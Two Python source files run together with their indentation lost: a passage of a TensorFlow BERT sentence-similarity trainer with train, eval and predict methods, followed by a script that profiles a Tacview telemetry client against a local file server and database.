"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
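# tf.data.experimental.map_and_batch is deprecated in recent TensorFlow releases; an
# equivalent form should be
#   d.map(lambda record: _decode_record(record, name_to_features)).batch(
#       batch_size, drop_remainder=drop_remainder)
# since separate map and batch calls are fused automatically by tf.data optimizations.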
return d
return input_fn
def train(self):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
bert_config = modeling.BertConfig.from_json_file(args.config_name)
if args.max_seq_len > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(args.max_seq_len, bert_config.max_position_embeddings))
tf.io.gfile.makedirs(args.output_dir)
label_list = self.processor.get_labels()
train_examples = self.processor.get_train_examples(args.data_dir)
num_train_steps = int(len(train_examples) / args.batch_size * args.num_train_epochs)
estimator = self.get_estimator()
train_file = os.path.join(args.output_dir, "train.tf_record")
self.file_based_convert_examples_to_features(train_examples, label_list, args.max_seq_len, self.tokenizer,
train_file)
tf.compat.v1.logging.info("***** Running training *****")
tf.compat.v1.logging.info(" Num examples = %d", len(train_examples))
tf.compat.v1.logging.info(" Batch size = %d", args.batch_size)
tf.compat.v1.logging.info(" Num steps = %d", num_train_steps)
train_input_fn = self.file_based_input_fn_builder(input_file=train_file, seq_length=args.max_seq_len,
is_training=True,
drop_remainder=True)
# early_stopping = tf.contrib.estimator.stop_if_no_decrease_hook(
# estimator,
# metric_name='loss',
# max_steps_without_decrease=10,
# min_steps=num_train_steps)
# estimator.train(input_fn=train_input_fn, hooks=[early_stopping])
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
def eval(self):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
eval_examples = self.processor.get_dev_examples(args.data_dir)
eval_file = os.path.join(args.output_dir, "eval.tf_record")
label_list = self.processor.get_labels()
self.file_based_convert_examples_to_features(
eval_examples, label_list, args.max_seq_len, self.tokenizer, eval_file)
tf.compat.v1.logging.info("***** Running evaluation *****")
tf.compat.v1.logging.info(" Num examples = %d", len(eval_examples))
tf.compat.v1.logging.info(" Batch size = %d", self.batch_size)
eval_input_fn = self.file_based_input_fn_builder(
input_file=eval_file,
seq_length=args.max_seq_len,
is_training=False,
drop_remainder=False)
estimator = self.get_estimator()
result = estimator.evaluate(input_fn=eval_input_fn, steps=None)
output_eval_file = os.path.join(args.output_dir, "eval_results.txt")
with tf.io.gfile.GFile(output_eval_file, "w") as writer:
tf.compat.v1.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.compat.v1.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
def predict(self, sentence1, sentence2):
if self.mode is None:
raise ValueError("Please set the 'mode' parameter")
self.input_queue.put([(sentence1, sentence2)])
prediction = self.output_queue.get()
return prediction
if __name__ == '__main__':
sim = BertSim()
sim.set_mode(tf.estimator.ModeKeys.TRAIN)
sim.train()
sim.set_mode(tf.estimator.ModeKeys.EVAL)
sim.eval()
# sim.set_mode(tf.estimator.ModeKeys.PREDICT)
# while True:
# sentence1 = input('sentence1: ')
# sentence2 = input('sentence2: ')
# predict = sim.predict(sentence1, sentence2)
# print(f'similarity:{predict[0][1]}')
profile_tac_consumer.py
#!/usr/bin/env python
import argparse
import asyncio
from functools import partial
from multiprocessing import Process
import sys
from pathlib import Path
import yappi # type: ignore
sys.path.append(str(Path(".").parent.absolute().joinpath("tacview_client")))
sys.path.append(str(Path(".").parent.absolute().joinpath("tests")))
import client, db, config, serve_file # type: ignore
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--iters", type=int, default=50000, help="Number of lines to read"
)
parser.add_argument(
"--profile", action="store_true", help="Set this flag to run yappi profiler"
)
parser.add_argument(
"--filename", type=Path, required=True, help="Filename to process"
)
parser.add_argument(
"--batch_size",
required=False,
type=int,
default=500000,
help="Number of records to be combined in write batches",
)
parser.add_argument(
"--debug", action="store_true", help="Should we run in debug mode?"
)
args = parser.parse_args()
server_proc = Process(
target=partial(serve_file.main, filename=args.filename, port=5555)
)
server_proc.start()
db.drop_tables()
db.create_tables()
if args.profile:
yappi.set_clock_type("cpu")
yappi.start(builtins=True)
client.main(
host="127.0.0.1",
port=5555,
debug=args.debug,
max_iters=args.iters,
batch_size=args.batch_size,
dsn=config.DB_URL,
)
if not args.profile:
asyncio.run(client.check_results())
server_proc.terminate() # type: ignore
if args.profile:
prof_filename = "callgrind.tacview.prof"
stats = yappi.get_func_stats()
stats.sort("ttot", "asc")
stats.save(prof_filename, type="callgrind") # type: ignore
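# The callgrind-format profile written above can be opened with KCachegrind/QCachegrind
# (e.g. `qcachegrind callgrind.tacview.prof`). A minimal in-process alternative, assuming
# yappi is still holding stats from this run:
#
#     stats = yappi.get_func_stats()
#     stats.sort("ttot")
#     stats.print_all()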